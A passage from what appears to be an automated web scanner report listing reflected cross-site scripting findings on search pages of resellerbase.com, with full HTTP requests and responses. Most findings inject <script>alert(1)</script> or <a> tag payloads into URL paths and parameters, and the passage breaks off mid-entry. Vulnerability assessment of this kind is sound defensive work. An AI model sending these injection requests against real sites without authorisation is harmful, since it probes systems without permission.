<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchd7eb5<a>4959c98ce31&opt=2 was not found on this server.</p>
...[SNIP]...

2.1619. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload fd71c<a>f1fe3f6bf29 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/19/themes/kosmos/images/rating/search.php?keyword=search...fd71c<a>f1fe3f6bf29&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images/rating/search.php?keyword=search...fd71c<a>f1fe3f6bf29&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1620. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bee94<script>alert(1)</script>7ef020e26c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&bee94<script>alert(1)</script>7ef020e26c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&bee94<script>alert(1)</script>7ef020e26c=1 was not found on this server.</p>
...[SNIP]...

2.1621. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 7a504<a>5f1717ce59b was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/19/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=27a504<a>5f1717ce59b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=27a504<a>5f1717ce59b was not found on this server.</p>
...[SNIP]...

2.1622. http://www.resellerbase.com/detail/19/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ed8ab<script>alert(1)</script>077e4fe547c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailed8ab<script>alert(1)</script>077e4fe547c/19/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailed8ab<script>alert(1)</script>077e4fe547c/19/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1623. http://www.resellerbase.com/detail/19/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 736a9<script>alert(1)</script>2234e7f5a7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19736a9<script>alert(1)</script>2234e7f5a7/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19736a9<script>alert(1)</script>2234e7f5a7/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1624. http://www.resellerbase.com/detail/19/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 68424<script>alert(1)</script>25a010e757d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes68424<script>alert(1)</script>25a010e757d/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes68424<script>alert(1)</script>25a010e757d/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1625. http://www.resellerbase.com/detail/19/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 51b66<script>alert(1)</script>bd84eba4d9d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos51b66<script>alert(1)</script>bd84eba4d9d/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos51b66<script>alert(1)</script>bd84eba4d9d/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1626. http://www.resellerbase.com/detail/19/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 3d9fb<script>alert(1)</script>bf0ccb638de was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/images3d9fb<script>alert(1)</script>bf0ccb638de/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images3d9fb<script>alert(1)</script>bf0ccb638de/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1627. http://www.resellerbase.com/detail/19/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 74843<script>alert(1)</script>3c9f11272e3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/images/search.php74843<script>alert(1)</script>3c9f11272e3?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images/search.php74843<script>alert(1)</script>3c9f11272e3?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1628. http://www.resellerbase.com/detail/19/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload e691e<a>bdbfa1498ca was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/19/themes/kosmos/images/search.php?keyword=search...&Submit3=Searche691e<a>bdbfa1498ca&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images/search.php?keyword=search...&Submit3=Searche691e<a>bdbfa1498ca&opt=2 was not found on this server.</p>
...[SNIP]...

2.1629. http://www.resellerbase.com/detail/19/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 93c35<a>6726b78b5ef was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/19/themes/kosmos/images/search.php?keyword=search...93c35<a>6726b78b5ef&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images/search.php?keyword=search...93c35<a>6726b78b5ef&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1630. http://www.resellerbase.com/detail/19/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 17861<script>alert(1)</script>5fd981b4783 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&17861<script>alert(1)</script>5fd981b4783=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&17861<script>alert(1)</script>5fd981b4783=1 was not found on this server.</p>
...[SNIP]...

2.1631. http://www.resellerbase.com/detail/19/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 92d7c<a>04abae5243 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/19/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=292d7c<a>04abae5243 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=292d7c<a>04abae5243 was not found on this server.</p>
...[SNIP]...

2.1632. http://www.resellerbase.com/detail/19/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5d200<script>alert(1)</script>ca32c867b6d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail5d200<script>alert(1)</script>ca32c867b6d/19/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail5d200<script>alert(1)</script>ca32c867b6d/19/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1633. http://www.resellerbase.com/detail/19/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 12062<script>alert(1)</script>088906f3de7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1912062<script>alert(1)</script>088906f3de7/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1912062<script>alert(1)</script>088906f3de7/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1634. http://www.resellerbase.com/detail/19/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b078e<script>alert(1)</script>f164f1565d3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themesb078e<script>alert(1)</script>f164f1565d3/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themesb078e<script>alert(1)</script>f164f1565d3/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1635. http://www.resellerbase.com/detail/19/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4fdfe<script>alert(1)</script>289d8c6c7c3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos4fdfe<script>alert(1)</script>289d8c6c7c3/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos4fdfe<script>alert(1)</script>289d8c6c7c3/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1636. http://www.resellerbase.com/detail/19/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7cadb<script>alert(1)</script>f88c04ec8be was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/search.php7cadb<script>alert(1)</script>f88c04ec8be?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

